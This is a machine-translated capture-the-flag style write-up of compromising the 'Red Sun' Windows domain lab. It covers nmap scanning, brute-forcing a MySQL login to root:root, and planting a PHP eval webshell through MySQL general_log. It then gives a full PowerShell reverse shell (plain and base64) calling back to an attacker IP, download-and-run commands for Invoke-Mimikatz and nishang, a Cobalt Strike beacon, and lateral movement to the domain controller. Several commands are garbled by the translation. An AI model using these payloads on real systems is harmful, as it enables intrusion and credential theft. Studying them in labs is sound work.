Red Sun Targeting Machine (I) Notes
summarize
Domain penetration target machine, you can practice some knowledge of the domain penetration, the main thing is to be familiar with powershell syntax, powershell tends to be more powerful than the command line of cmd, and a lot of penetration of open source scripts are powershell. For exampleNiShang
,PowerView
And so on. This is a beginner target machine for domain penetration. There were some problems encountered with it
Target machine address:/vuln/detail/2/
Default password for Red Sun Target: hongrisec@2019
I'm here.
- web:192.168.81.239
- win7: 192.168.52.141
- Domain Control: 192.168.52.138
The kali attacker I'm looking at is 192.168.81.37.
I. nmap scanning
1) Host discovery
sudo nmap -sn 192.168.81.0/24
Nmap scan report for 192.168.81.239
Host is up (0.00047s latency).
MAC Address: 00:0C:29:EC:F8:D6 (VMware)
I see my target machine's ip is192.168.81.239
2) Port scanning
sudo nmap -sT --min-rate 10000 -p- 192.168.81.239
# Nmap 7.93 scan initiated Wed Sep 4 05:56:09 2024 as: nmap -sT --min-rate 10000 -p- -o ports 192.168.81.239
Warning: 192.168.81.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.81.239
Host is up (0.00079s latency).
Not shown: 61205 closed tcp ports (conn-refused), 4319 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1230/tcp open periscope
3306/tcp open mysql
MAC Address: 00:0C:29:EC:F8:D6 (VMware)
# Nmap done at Wed Sep 4 05:56:21 2024 -- 1 IP address (1 host up) scanned in 12.44 seconds
Processing of ports
cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','
assign a value to a variable
ports=$(cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',')
3) Detailed information scanning
It's here.$ports
Available attab
The key displays the value of the variable
sudo nmap -sT -sV -sC -O -p$ports 192.168.81.239 -o details
# Nmap 7.93 scan initiated Wed Sep 4 06:01:26 2024 as: nmap -sT -sC -sV -O -p80,135,139,445,1025,1026,1027,1028,1029,1230,3306 -o details 192.168.81.239
Nmap scan report for 192.168.81.239
Host is up (0.00097s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1029/tcp open msrpc Microsoft Windows RPC
1230/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:EC:F8:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 000c29ecf8d6 (VMware)
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-09-04T10:02:28
|_ start_date: 2024-09-04T09:46:14
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: stu1
| NetBIOS computer name: STU1\x00
| Domain name:
| Forest name:
| FQDN:
|_ System time: 2024-09-04T18:02:28+08:00
OS and Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Wed Sep 4 06:02:39 2024 -- 1 IP address (1 host up) scanned in 73.24 seconds
II. Web Penetration
Open WEB page
It's a php probe, scroll down
I see a button to check mysql
Enter whatever you want. Turn on burp.
catch
sudo vi pass_req
Paste in the http raw format.
POST / HTTP/1.1
Host: 192.168.81.239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Origin: http://192.168.81.239
Connection: close
Referer: http://192.168.81.239/
Upgrade-Insecure-Requests: 1
host=localhost&port=3306&login=FUZZ1&password=FUZZ2&act=MySQL%E6%A3%80%E6%B5%8B&funName=
Change the parameter to be blasted to FUZZ style.login=FUZZ1&password=FUZZ2
1) Password Blasting
Here I use the ffuf utility, -mode can specify the burst mode, -w is also a more conventional username and password for the weak password dictionary
Of course, it's okay to use burp, it's up to you.
sudo ffuf --request pass_req -u http://192.168.81.239 -w /usr/share/SecLists/Usernames/:FUZZ1 -w /usr/share/SecLists/Passwords/2023-200_most_used_passwords.txt:FUZZ2 -fs 14807 -mode clusterbomb
Results:
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : http://192.168.81.239
:: Wordlist : FUZZ1: /usr/share/SecLists/Usernames/
:: Wordlist : FUZZ2: /usr/share/SecLists/Passwords/2023-200_most_used_passwords.txt
:: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Origin: http://192.168.81.239
:: Header : Connection: close
:: Header : Referer: http://192.168.81.239/
:: Header : Host: 192.168.81.239
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
:: Header : Accept-Encoding: gzip, deflate
:: Header : Upgrade-Insecure-Requests: 1
:: Data : host=localhost&port=3306&login=FUZZ1&password=FUZZ2&act=MySQL%E6%A3%80%E6%B5%8B&funName=
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 14807
________________________________________________
[Status: 200, Size: 14804, Words: 1464, Lines: 401, Duration: 2136ms]
* FUZZ1: root
* FUZZ2: root
:: Progress: [3400/3400] :: Job [1/1] :: 19 req/sec :: Duration: [0:02:59] :: Errors: 0 ::
Weak passwords existroot:root
We put it in the voucher.
echo 'root:root' > creds
2) Catalog Blasting
Got the database credentials, and this is a phpstudy site, so let's do a little directory blasting to see if there are any backend pages and such
sudo gobuster dir -u http://192.168.81.239 -w /usr/share/wordlists/dirbuster/directory-list-2.
Here we use gobuster of course many tools can do directory blasting such as: feroxbuster ffuf dirb dirsearch wfuzz and so on have the corresponding functions, but the tools will use different algorithms, when we can not go down a tool, you can try another tool, it is very likely to have the results we want!
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.81.239
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/%20 (Status: 403) [Size: 210]
/*checkout* (Status: 403) [Size: 219]
/phpmyadmin (Status: 301) [Size: 241] [--> http://192.168.81.239/phpmyadmin/]
/*docroot* (Status: 403) [Size: 218]
/* (Status: 403) [Size: 210]
/con (Status: 403) [Size: 212]
/http%3A (Status: 403) [Size: 214]
/**http%3a (Status: 403) [Size: 216]
/*http%3A (Status: 403) [Size: 215]
/aux (Status: 403) [Size: 212]
/**http%3A (Status: 403) [Size: 216]
/%C0 (Status: 403) [Size: 210]
/%3FRID%3D2671 (Status: 403) [Size: 218]
/devinmoore* (Status: 403) [Size: 220]
/200109* (Status: 403) [Size: 216]
/*sa_ (Status: 403) [Size: 213]
/*dc_ (Status: 403) [Size: 213]
/%D8 (Status: 403) [Size: 210]
/%CE (Status: 403) [Size: 210]
/%CF (Status: 403) [Size: 210]
/%CD (Status: 403) [Size: 210]
/%CB (Status: 403) [Size: 210]
/%CC (Status: 403) [Size: 210]
/%D1 (Status: 403) [Size: 210]
/%CA (Status: 403) [Size: 210]
/%D0 (Status: 403) [Size: 210]
/%D3 (Status: 403) [Size: 210]
/%D6 (Status: 403) [Size: 210]
/%D7 (Status: 403) [Size: 210]
/%D5 (Status: 403) [Size: 210]
/%D4 (Status: 403) [Size: 210]
/%D2 (Status: 403) [Size: 210]
/%C9 (Status: 403) [Size: 210]
/%C1 (Status: 403) [Size: 210]
/%C8 (Status: 403) [Size: 210]
/%C2 (Status: 403) [Size: 210]
/%C5 (Status: 403) [Size: 210]
/%C6 (Status: 403) [Size: 210]
/%C7 (Status: 403) [Size: 210]
/%C3 (Status: 403) [Size: 210]
/%C4 (Status: 403) [Size: 210]
/%D9 (Status: 403) [Size: 210]
/%DE (Status: 403) [Size: 210]
/%DF (Status: 403) [Size: 210]
/%DD (Status: 403) [Size: 210]
/%DB (Status: 403) [Size: 210]
/phpMyAdmin (Status: 301) [Size: 241] [--> http://192.168.81.239/phpMyAdmin/]
/login%3f (Status: 403) [Size: 215]
/%22james%20kim%22 (Status: 403) [Size: 230]
/%22julie%20roehm%22 (Status: 403) [Size: 232]
/%22britney%20spears%22 (Status: 403) [Size: 235]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
there arephpMyAdmin
page, let's visit the
Enter the voucher that was just blasted outroot:root
You're logged into the backend of the database.
III. Gaining a foothold
phpmyadmin background getshell method
- Write directly to the webshell from the web directory using select ... into outfile into webshell (write access required)
- Writing to webshell using logs
The first one we execute
SHOW VARIABLES LIKE '%secure%'
see that
secure_file_priv
be valued atNULL
Disables writing to files. If this value is a directory name, files can be written in the specified directory.
This value is a read-only variable and can only be modified through the configuration file.
The first one doesn't work anymore.
The second type utilizes log files
SHOW VARIABLES LIKE 'general%'
general_log
: indicates a switch for the logging function, which can be set with the sql statement
general_log_file
: It specifies the absolute path where our logs will be generated.
Logging will be turned on to record all of our sql statements.
set global general_log=on;# Enable logging
set global general_log_file='C:/phpStudy/WWW/';# Set log location to web directory
Absolute paths are already available in the php probe at the beginning, let's turn global logging on
fulfillment
select '<?php @eval($_GET["code"]);?>'
interviews
Rebound shell
In the real attack and defense, it is also not recommended to connect directly to the tools such as chopper and ant sword, because their traffic characteristics are too obvious, and a little inattention will cause the alarm of traffic monitoring equipment. Although Godzilla has encrypted the traffic, its * horse format, communication protocol and behavioral characteristics are relatively fixed, if you want to use it, it is still recommended to do the secondary development on the basis of their own, to achieve the bypass of some of the detection equipment.
a) Wrong attempts
On the kali side, install theIf you want to use the smbserver service, turn on the smbserver service and listen to it.
The following command uses python to open a smb shared directory named share in the current folder
python /usr/share/doc/python3-impacket/examples/ share .
listening port
nc -lvp 8888
Command Injection, Access Links
http://192.168.81.239/?code=system('\\\\192.168.81.37\\share\\ -e 192.168.81.37 8888 );
Here smb shows a normal connection. I waited for half a day for it to pop back up, which was a bit annoying, so I cheated and went to look in its window7 and found that
The win7 on this target machine is not compatible with nc ah, I tried both 64 and 32 bit and neither is compatible. But it's a thought to tell you all, so you can be more impressed with the smb service!
b) Direct command injection
google look for sth. :php reverse windows powershell
Read the article:/from-php-s-hell-to-powershell-heaven-da40ce840da8
Getting a more interactive shell with rlwrap
sudo rlwrap nc -lvp 8888
powershell Command to establish a connection
powershell -nop -c "$client = New-Object ('192.168.81.37',8888);$stream = $();[byte[]]$bytes = 0..65535|%{0};while(($i = $($bytes, 0, $)) -ne 0){;$data = (New-Object -TypeName ).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([]::ASCII).GetBytes($sendback2);$($sendbyte,0,$);$()};$()"
base64 encoding
cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxOTIuMTY4LjgxLjM3Jyw4ODg4KTskc3RyZWFtID0gJGNsaWVudC5HZXRTdHJlYW0oKTtbYnl0ZVtdXSRieXRlcyA9IDAuLjY1NTM1fCV7MH07d2hpbGUoKCRpID0gJHN0cmVhbS5SZWFkKCRieXRlcywgMCwgJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSAkc2VuZGJhY2sgKyAnUFMgJyArIChwd2QpLlBhdGggKyAnPiAnOyRzZW5kYnl0ZSA9IChbdGV4dC5lbmNvZGluZ106OkFTQ0lJKS5HZXRCeXRlcygkc2VuZGJhY2syKTskc3RyZWFtLldyaXRlKCRzZW5kYnl0ZSwwLCRzZW5kYnl0ZS5MZW5ndGgpOyRzdHJlYW0uRmx1c2goKX07JGNsaWVudC5DbG9zZSgpIg==
Because of the special characters in the command, I tried typing it directly or url encoding it, and it didn't bounce unsuccessfully, so I encoded it in base64 and decoded it with the base64_decode() method of the php function, to avoid any interference from the special characters.
access link
http://192.168.81.239/?code=system(base64_decode("cG93ZXJzaGVsbCAtbm9wIC1jICIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCcxOTIuMTY4LjgxLjM3Jyw4ODg4KTskc3RyZWFtID0gJGNsaWVudC5HZXRTdHJlYW0oKTtbYnl0ZVtdXSRieXRlcyA9IDAuLjY1NTM1fCV7MH07d2hpbGUoKCRpID0gJHN0cmVhbS5SZWFkKCRieXRlcywgMCwgJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSAkc2VuZGJhY2sgKyAnUFMgJyArIChwd2QpLlBhdGggKyAnPiAnOyRzZW5kYnl0ZSA9IChbdGV4dC5lbmNvZGluZ106OkFTQ0lJKS5HZXRCeXRlcygkc2VuZGJhY2syKTskc3RyZWFtLldyaXRlKCRzZW5kYnl0ZSwwLCRzZW5kYnl0ZS5MZW5ndGgpOyRzdHJlYW0uRmx1c2goKX07JGNsaWVudC5DbG9zZSgpIg=="));
Successful shell bounce
I got lucky and bounced right back to the user with system privileges, so I don't have to lift the privileges.
Get the shell, change the encoding format first
chcp 65001
IV. Domain information collection
Viewing the NIC
ipconfig /all
spot192.168.52.0
The NIC of the network segment should be the corresponding intranet NIC of the domain, the hostname of the local machine and the information of the domain can also be seen
System Information
systeminfo
Seeing that the domian field is represents that this is the machine in the domain.
The default field for regular machines is:WORKGROUP
You can also see some information about the machine that has been patched, as well as the network card information
routing information
route pirnt
Additional Hosting Information
net view
View Domain Administrators
V. Domain penetration
We know from our information gathering that the domain control hosts areowa
The domain name is
View domain control host ip
ping
I see that the domain control ip is192.168.52.138
Password Grabbing with mimikatz
1) Upload Invoke-mimikatz.ps1
Invoke-mimikatz.ps1 connection:/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
Enabling the http service
php -S 0:80
Viewing powershell version information for a machine
$
Because there is a slight difference in the commands before and after powershell 3.0
The powershell on the target machine is version 2.0 and theInvoke-WebRequest
The cmdlet was introduced with PowerShell 3.0.
We use the .NET class to realize the download function
powershell -command "& {(New-Object ).DownloadFile('http://192.168.81.37/Invoke-Mimikatz.ps1','c:\program files\Invoke-Mimikatz.ps1')}"
See the successful upload at the http service
Uploaded.c:\program files
directory
cd c:\'program files'
dir
I see it uploaded successfully.
Of course, mimikatz also needs to be free of antivirus, otherwise its operation will trigger the antivirus program as well.
2) Run mimikatz
Running Invoke-Mimikatz.ps1 in powershell First we need to disable the execution policy
Get-ExecutionPolicy
Restricted
: No scripts are allowed to run.
AllSigned
: Only run scripts signed by trusted publishers.
RemoteSigned
: Locally created scripts can be run, remotely downloaded scripts must be signed.
Unrestricted
: All scripts are allowed to run, but there is a warning when running scripts downloaded from the Internet.
We set it toRemoteSigned
can immediately (do sth)
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
Of course, you can also use theBypass
This parameter performs a single-command bypass
import (data)
Import-moudle .\Invoke-Mimikatz.ps1
(of cargo etc) load
.\Invoke-Mimikatz.ps1
fulfillment
Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords"
It's not responding.
Theoretically, it should be able to grab passwords properly, and I've had a lot of problems with this target machine I've been hitting.
Attempts to solve problems (failed)
I wonder if it's because powershell is not very stable when executing code in php.
Would the bounce back be more stable if we used nishang's tcp script? Try usingnishang
rebound (of stock market etc)
sudo apt install nishang
Enter the command nishang to see the directory
nishang
cd Shells
see thatInvoke-PowerShellTcp.ps1
file
sudo vi Invoke-PowerShellTcp.ps1
At the bottom of its file, add the bounce shell statement
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.81.37 -Port 4444
It's just waiting for him to load into memory to execute the logic of the bounce shell.
kali listener with http service enabled
nc -lvp 4444
php -S 0:80
At the command line, execute
powershell -command "& {(new-object ).downloadfile('http://192.168.81.37/Invoke-PowerShellTcp.ps1','c:\Invoke-PowerShellTcp.ps1')}" ; c:\Invoke-PowerShellTcp.ps1
Downloaded successfully, received the bounce shell, but it's the same shell as before, still can't run mimikatz.ps1
3) Replacement of ideas (using cobalstrike)
Start cs
./teamserver localhost 123456
./cobalstrike
Generate * horse and upload
powershell -ExecutionPolicy Bypass -command "& {(New-Object ).DownloadFile('http://192.168.81.37/', 'C:\Users\Public\')}"
activate (a plan)
/c ".\"
Successful launch
port scanning
see that
Run mimikatz
See domain controlowa
passwordshongrisec@2022
VI. Access to domain control
Already have the password for the domain administrator Getting domain control is easy!
Create SMB listener on cs
Direct jump
Saw domain control go live.
I've got the domain control. I'll take this domain wherever I want.
Jump to host 141.
Successfully took down three units
summarize
- The nmap scan shows that the target web server has ports 80, 135, and 3306 open, and through directory blasting on port 80 and weak password fuzzing, the backend of phpmyadmin was found and successfully logged in.
- Using the log output from the database, a one-sentence * was written to successfully bounce the command line of powershell. Because of the flaws in the command line of powershell 2.0, I encountered a situation where mimikatz could not be used during the domain penetration information collection, and tried to solve it but failed.
- Finally, the cobalstrike integration tool was used to complete the lateral move to the domain control and successfully gain domain control administrator privileges.